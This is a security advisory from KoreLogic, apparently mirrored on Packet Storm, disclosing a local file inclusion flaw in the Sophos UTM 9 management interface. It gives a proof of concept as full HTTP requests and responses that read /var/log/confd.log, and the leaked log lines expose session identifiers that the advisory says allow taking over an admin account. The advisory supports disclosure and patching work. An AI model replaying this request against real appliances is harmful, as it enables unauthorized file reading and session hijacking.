Sophos UTM 9 Management Appplication Local File Inclusion

2017-10-25T00:00:00
ID PACKETSTORM:144753
Type packetstorm
Reporter Matthew Bergin
Modified 2017-10-25T00:00:00

Description

                                        
                                            `KL-001-2017-021 : Sophos UTM 9 Management Appplication Local File Inclusion  
  
Title: Sophos UTM 9 Management Application Local File Inclusion  
Advisory ID: KL-001-2017-021  
Publication Date: 2017.10.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-021.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: UTM 9  
Affected Version: 9.410  
Platform: Embedded Linux  
CWE Classification: CWE-538: File and Directory Information Exposure,  
CWE-264: Permissions, Privileges, and Access Controls,  
CWE-532: Information Exposure Through Log Files  
Impact: Information Disclosure  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
Any user is has log viewing rights provisioned can read  
arbitrary files from the local filesystem as a limited privilege  
user. This can be used to read the confd log file and obtain  
root privilege SID values.  
  
3. Technical Description  
  
Any user who has permission to access the 'Logging & Reporting'  
functionality within the management application can read  
arbitrary files.  
  
POST /webadmin.plx HTTP/1.1  
Host: 1.3.3.7:4444  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.5.1.1  
Content-Type: application/json; charset=UTF-8  
Content-Length: 313  
Cookie: SID=SoCKGdoKFmeobxZTEWDz  
DNT: 1  
Connection: close  
  
{"objs": [{"filename": "/var/log/confd.log", "FID": "log_download_single"}], "SID": "SoCKGdoKFmeobxZTEWDz", "browser":  
"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":  
"1491835733989_0.7813499665507969", "current_uuid": "189fb61e-e01b-11da-8017-0014221e9eba", "ipv6": false}  
  
HTTP/1.1 200 OK  
Date: Mon, 10 Apr 2017 07:49:51 GMT  
Server: Apache  
Expires: Thursday, 01-Jan-1970 00:00:01 GMT  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Option: nosniff  
X-XSS-Protection: 1; mode=block  
Vary: Accept-Encoding  
Connection: close  
Content-Type: application/json; charset=utf-8  
Content-Length: 605  
  
{"SID":"SoCKGdoKFmeobxZTEWDz","ipv6":false,"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","browser":"gecko","RID":"1491835733989_0.7813499665507969","js":"if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["SoCKGdoKFmeobxZTEWDz"],"globals":["SID"],"objs":[{"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","FID":"log_download_single","filename":"/var/log/confd.log","js":"start_download('var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log');"}],"_cookie":null,"wdebug":0}  
  
The start_download() function is JavaScript loaded into the  
browser. This function takes the given parameter and uses it  
to build the subsequent HTTP GET request.  
  
GET /var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log HTTP/1.1  
Host: 1.3.3.7:4444  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Referer: https://1.3.3.7:4444/  
Cookie: SID=SoCKGdoKFmeobxZTEWDz  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
HTTP/1.1 200 OK  
Date: Mon, 10 Apr 2017 07:51:02 GMT  
Server: Apache  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Option: nosniff  
X-XSS-Protection: 1; mode=block  
Cache-Control: max-age=31536000  
Expires: Tue, 10 Apr 2018 07:51:02 GMT  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/plain; charset=utf-8  
Content-Length: 2595127  
  
2017:04:02-00:00:01 hostname confd[28056]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv"  
facility="system" client="ips-reporter.pl" call="new"<31>Apr 2 00:00:01 confd[28056]: D sys::AUTOLOAD:303() =>  
id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1"  
facility="system" client="ips-reporter.pl" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none"  
method="signal_unsubscribe"  
2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="logout"  
2017:04:02-00:00:01 hostname confd[28056]: D Session::terminate:290() => id="3100" severity="debug" sys="System"  
sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv" facility="system"  
client="ips-reporter.pl" call="logout" function="logout"  
2017:04:02-00:00:01 hostname confd[28056]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd"  
name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl"  
2017:04:02-00:00:01 hostname confd[28070]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj"  
facility="system" client="spx-password-expire" call="new"<31>Apr 2 00:00:01 confd[28070]: D sys::AUTOLOAD:303() =>  
id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1"  
facility="system" client="spx-password-expire" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="get"  
2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none"  
method="logout"  
2017:04:02-00:00:01 hostname confd[28070]: D Session::terminate:290() => id="3100" severity="debug" sys="System"  
sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj" facility="system"  
client="spx-password-expire" call="logout" function="logout"  
2017:04:02-00:00:02 hostname confd[28070]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd"  
name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire"  
2017:04:02-00:00:01 hostname confd[28083]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj"  
facility="system" client="admin-reporter.pl" call="new"<31>Apr 2 00:00:02 confd[28083]: D sys::AUTOLOAD:303() =>  
id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1"  
facility="system" client="admin-reporter.pl" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28086]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="BXeDpxEvboHeDEmaaHEY"  
facility="system" client="vpnreporter" call="new"<31>Apr 2 00:00:02 confd[28086]: D sys::AUTOLOAD:303() => id="3100"  
severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system"  
client="vpnreporter" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28088]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="SBggtglcePoJTWtmkIMO"  
facility="system" client="websecreporter" call="new"<31>Apr 2 00:00:02 confd[28088]: D sys::AUTOLOAD:303() => id="3100"  
severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system"  
client="websecreporter" lock="none" method="get_SID"  
2017:04:02-00:00:02 hostname confd[28086]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="vpnreporter" lock="none"  
method="signal_subscribe"  
2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none"  
method="signal_unsubscribe"  
2017:04:02-00:00:02 hostname confd[28088]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="websecreporter" lock="none"  
method="signal_subscribe"  
2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none"  
method="logout"  
2017:04:02-00:00:02 hostname confd[28083]: D Session::terminate:290() => id="3100" severity="debug" sys="System"  
sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj" facility="system"  
client="admin-reporter.pl" call="logout" function="logout"  
...  
...  
  
The logging of 'sid' values is also dangerous because it  
leaks session identifiers who may be of higher privilege. A  
'sid' for the admin account can be used to change the root  
and loginuser passwords.  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has addressed this vulnerability in version 9.503. Release notes and download instructions can be found at:  
https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic submits vulnerability details to Sophos.  
2017.07.21 - Sophos acknowledges receipt.  
2017.09.01 - 30 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.09.15 - KoreLogic requests an update on the status of this  
and other vulnerabilities reported to Sophos.  
2017.09.18 - Sophos informs KoreLogic that this issue has been  
remediated in release 9.503 for UTM.  
2017.10.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`